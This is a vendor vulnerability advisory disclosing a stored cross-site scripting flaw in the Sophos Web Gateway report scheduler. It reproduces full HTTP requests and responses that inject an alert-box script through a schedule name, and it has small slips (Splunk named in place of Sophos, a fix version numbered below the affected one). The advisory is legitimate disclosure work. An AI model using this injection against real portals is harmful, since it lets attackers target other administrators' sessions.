KL-001-2018-001 : Sophos Web Gateway Persistent Cross Site Scripting Vulnerability Title: Sophos Web Gateway Persistent Cross Site Scripting Vulnerability Advisory ID: KL-001-2018-001 Publication Date: 2018.01.26 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-001.txt 1. Vulnerability Details Affected Vendor: Sophos Affected Product: Web Gateway Affected Version: 4.4.1 Platform: Embedded Linux CWE Classification: CWE-79: Improper Neutralization of Input During Web Page Generation, CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page Impact: Arbitrary Code Execution Attack vector: HTTP 2. Vulnerability Description The report scheduler menu within the management portal contains a persistent cross site scripting vulnerability. This vulnerability can be used to target other users of the same portal. 3. Technical Description A valid session is required to create the report with the persistent cross site scripting payload attached. An example attack payload has been included below. This payload is designed to trigger an alert box with the number one being displayed. POST /index.php?c=report_scheduler HTTP/1.1 Host: 1.3.3.7 Accept-Language: en-US,en;q=0.5 X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.6.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 1190 DNT: 1 Connection: close action=save&STYLE=016a16896568739c11955632068abddd&data=%5b%7b%22%53%54%59%4c%45%22%3a%20%22%30%31%36%61%31%36%38%39%36%35%36%38%37%33%39%63%31%31%39%35%35%36%33%32%30%36%38%61%62%64%64%64%22%2c%20%22%63%62%5f%74%72%61%66%5f%70%65%72%66%22%3a%20%22%79%65%73%22%2c%20%22%73%62%5f%64%65%74%61%69%6c%65%64%5f%70%6f%6c%69%63%79%5f%63%6f%75%6e%74%22%3a%20%22%31%22%2c%20%22%73%62%5f%67%72%6f%75%70%73%22%3a%20%22%73%6f%70%68%6f%73%5f%73%77%61%5f%61%6c%6c%5f%64%65%70%61%72%74%6d%65%6e%74%73%22%2c%20%22%72%64%5f%73%63%68%65%64%75%6c%65%22%3a%20%22%64%61%69%6c%79%22%2c%20%22%73%62%5f%64%61%79%73%22%3a%20%22%37%22%2c%20%22%73%62%5f%77%65%65%6b%6c%79%5f%64%61%79%22%3a%20%22%4d%6f%6e%64%61%79%22%2c%20%22%74%78%74%5f%73%63%68%65%64%75%6c%65%5f%6e%61%6d%65%22%3a%20%22%74%65%73%74%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3b%3c%2f%73%63%72%69%70%74%3e%22%2c%20%22%63%62%5f%61%63%74%69%76%61%74%65%5f%73%63%68%65%64%75%6c%65%22%3a%20%22%79%65%73%22%2c%20%22%72%65%63%69%70%69%65%6e%74%73%22%3a%20%22%74%65%73%74%40%74%65%73%74%2e%61%73%64%61%73%64%22%2c%20%22%73%63%68%65%64%75%6c%65%5f%69%64%22%3a%20%22%64%47%56%7a%64%41%3d%3d%22%2c%20%22%6f%77%6e%65%72%22%3a%20%22%61%64%6d%69%6e%22%7d%5d HTTP/1.1 200 OK Date: Sat, 29 Jul 2017 16:05:25 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0 Pragma: no-cache X-Frame-Options: sameorigin X-Content-Type-Options: nosniff Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 41 {"status":0,"statusMsg":"Settings saved"} The URL-encoded input being passed in input parameter can be decoded to a array containing a single JSON buffer. [{"STYLE": "016a16896568739c11955632068abddd", "cb_traf_perf": "yes", "sb_detailed_policy_count": "1", "sb_groups": "sophos_swa_all_departments", "rd_schedule": "daily", "sb_days": "7", "sb_weekly_day": "Monday", "txt_schedule_name": "test<script>alert(1);</script>", "cb_activate_schedule": "yes", "recipients": "test@test.asdasd", "schedule_id": "dGVzdA==", "owner": "admin"}] Within the JSON buffer is a key called txt_schedule_name. The value for this key is the name of the scheduled report. This value is included in the report schedule list. "txt_schedule_name": "test<script>alert(1);</script>" The HTML tags are then stored. When the report schedule is viewed, the resulting JSON is sent as content-type text/html instead of application/json, causing the browser to execute any unescaped javascript it contains. The output is HTML-encoded with the exception of the txt_schedule_name: value which is not sanitized, and the payload triggers. POST /index.php?c=report_scheduler HTTP/1.1 Host: 1.3.3.7 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.6.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 81 DNT: 1 Connection: close action=load&sortKey=name&sortDirection=asc&STYLE=016a16896568739c11955632068abddd HTTP/1.1 200 OK Date: Sat, 29 Jul 2017 16:06:38 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0 Pragma: no-cache X-Frame-Options: sameorigin X-Content-Type-Options: nosniff Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 1365 {"sortKey":"name","sortDirection":"asc","schedulesJS":[{"STYLE":"016a16896568739c11955632068abddd","cb_traf_perf":"yes","sb_detailed_policy_count":"1","sb_groups":"sophos_swa_all_departments","rd_schedule":"daily","sb_days":"7","sb_weekly_day":"Monday","txt_schedule_name":"test<script>alert(1);<\/script>","cb_activate_schedule":"yes","recipients":"test@test.asdasd","schedule_id":"dGVzdA==","owner":"admin"}],"schedulesList":"<ul id=\"table_entries_list\"><li class=\"body schedule-row \" id=\"li_test<script>alert(1);<\/script>\"><div class=\"schedulename\"><a href=\"?STYLE=016a16896568739c11955632068abddd#\" title=\"test<script>alert(1);<\/script>\">test<script>alert(1);<\/script><\/a><\/div><div class=\"owner\" title=\"admin\">admin<\/div><div class=\"schedule_time\" title=\"Daily\">Daily<\/div><div title=\"Active\" class=\"schedule-active-on\"><\/div><div class=\"action\"><a href=\"?STYLE=016a16896568739c11955632068abddd#\" id=\"on_off_test<script>alert(1);<\/script>\" name=\"on_off_test<script>alert(1);<\/script>\" class=\"button small\"><span class=\"buttonLabel small\" id=\"on_off_span_test<script>alert(1);<\/script>\">Turn Off<\/span><\/a><\/div><div class=\"delete\"><input type=\"checkbox\" id=\"chk_test<script>alert(1);<\/script>\"\/><\/div><\/li><\/ul>"} 4. Mitigation and Remediation Recommendation The vendor has released version 4.3.3.1 of the Web Gateway which addesses this issue. Release notes available at: http://wsa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.3.1.html 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2017.08.17 - KoreLogic submits vulnerability details to Sophos. 2017.08.17 - Sophos confirms receipt. 2017.09.29 - 30 business days have elapsed since the vulnerability was reported to Sophos. 2017.10.17 - KoreLogic requests an update from Sophos. 2017.10.19 - Sophos informs KoreLogic that they will issue a fix in the next maintenance release, scheduled for the end of November. Sophos asks KoreLogic to hold disclosure until the new version is released. 2017.10.23 - 45 business days have elapsed since the vulnerability was reported to Splunk. 2017.11.02 - Sophos notifies KoreLogic that the maintenance release has gone live. 2018.01.26 - KoreLogic public disclosure. 7. Proof of Concept See 3. Technical Description. The contents of this advisory are copyright(c) 2018 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
Attachment:
signature.asc
Description: OpenPGP digital signature